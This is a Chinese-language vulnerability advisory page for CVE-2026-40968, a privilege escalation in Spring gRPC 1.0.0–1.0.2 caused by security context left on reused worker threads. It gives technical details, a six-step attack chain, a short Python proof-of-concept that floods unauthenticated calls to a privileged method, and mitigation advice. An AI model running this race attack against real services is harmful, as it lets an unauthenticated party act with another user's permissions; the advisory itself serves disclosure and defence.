CVE-2026-40968 CVSS 4.2 中危

CVE-2026-40968 Spring gRPC权限提升漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40968

漏洞类型

权限提升

CVSS评分

4.2 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Spring gRPC

漏洞概述

Spring gRPC 在处理已认证用户的 gRPC 方法访问拒绝请求时存在安全漏洞。当已认证用户被拒绝访问后，其身份信息仍绑定在 gRPC 工作线程上。如果该线程后续处理未认证的请求，该请求会继承之前的身份信息，导致未认证用户获得过高的权限，造成权限提升风险。

技术细节

该漏洞源于 Spring gRPC 在处理请求上下文时的线程安全问题。在 gRPC 服务模型中，工作线程通常会被重用。当一个已认证用户请求访问受保护的 gRPC 方法被拒绝（例如权限不足）时，框架应当清理当前线程的安全上下文。然而，受影响版本未能正确执行此清理操作，导致用户的认证身份信息仍残留在线程的 ThreadLocal 或类似存储中。攻击者可以通过发送大量未认证请求与之竞争，利用线程复用机制，使自己的请求恰好落在已清理失败的线程上。由于框架认为该线程仍持有合法身份，攻击者便能够继承前一个用户的权限，执行未经授权的操作。

攻击链分析

STEP 1

1. 侦察

攻击者识别目标服务器运行的是易受攻击的 Spring gRPC 版本（1.0.0 至 1.0.2）。

STEP 2

2. 触发上下文残留

等待或诱导合法用户（受害者）发起一个需要认证但会被拒绝的 gRPC 请求。

STEP 3

3. 线程污染

服务器处理拒绝请求后，未能清理 gRPC 工作线程上的安全上下文，导致用户身份残留。

STEP 4

4. 竞争请求

攻击者向服务器发送大量未认证的 gRPC 请求，试图命中被污染的线程。

STEP 5

5. 权限继承

攻击者的请求被分配到含有受害者身份的线程处理，从而绕过认证检查。

STEP 6

6. 提权执行

攻击者以受害者的权限执行受限操作，完成权限提升攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import grpc
import time
from generated_code import my_service_pb2, my_service_pb2_grpc

# Target server address
TARGET = "localhost:9090"

def exploit_attempt():
    # Create an insecure channel (simulating unauthenticated request)
    with grpc.insecure_channel(TARGET) as channel:
        stub = my_service_pb2_grpc.MyServiceStub(channel)

        # Loop to increase chance of hitting a 'dirty' thread
        for i in range(1000):
            try:
                # Call a privileged method
                # Normally this should fail with UNAUTHENTICATED or PERMISSION_DENIED
                response = stub.PrivilegedMethod(my_service_pb2.Request(data="test"))
                
                # If we get here, we likely inherited permissions
                print(f"[+] Success on attempt {i}: {response}")
                break
            except grpc.RpcError as e:
                # Expected behavior for unauthenticated users
                if e.code() == grpc.StatusCode.PERMISSION_DENIED:
                    continue
                else:
                    print(f"Error: {e.code()}")

if __name__ == "__main__":
    exploit_attempt()

影响范围

Spring gRPC 1.0.0 至 1.0.2

旧版本（不受支持）

防御指南

临时缓解措施

建议立即升级至修复版本。如无法立即升级，可在拦截器链中添加自定义逻辑强制清理安全上下文，或通过网关层限制并发请求以降低攻击成功率。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-40968
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-40968
3 Details https://www.cvedetails.com/cve/CVE-2026-40968/
4 VulDB https://vuldb.com/cve/CVE-2026-40968
5 Link https://spring.io/security/cve-2026-40968

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表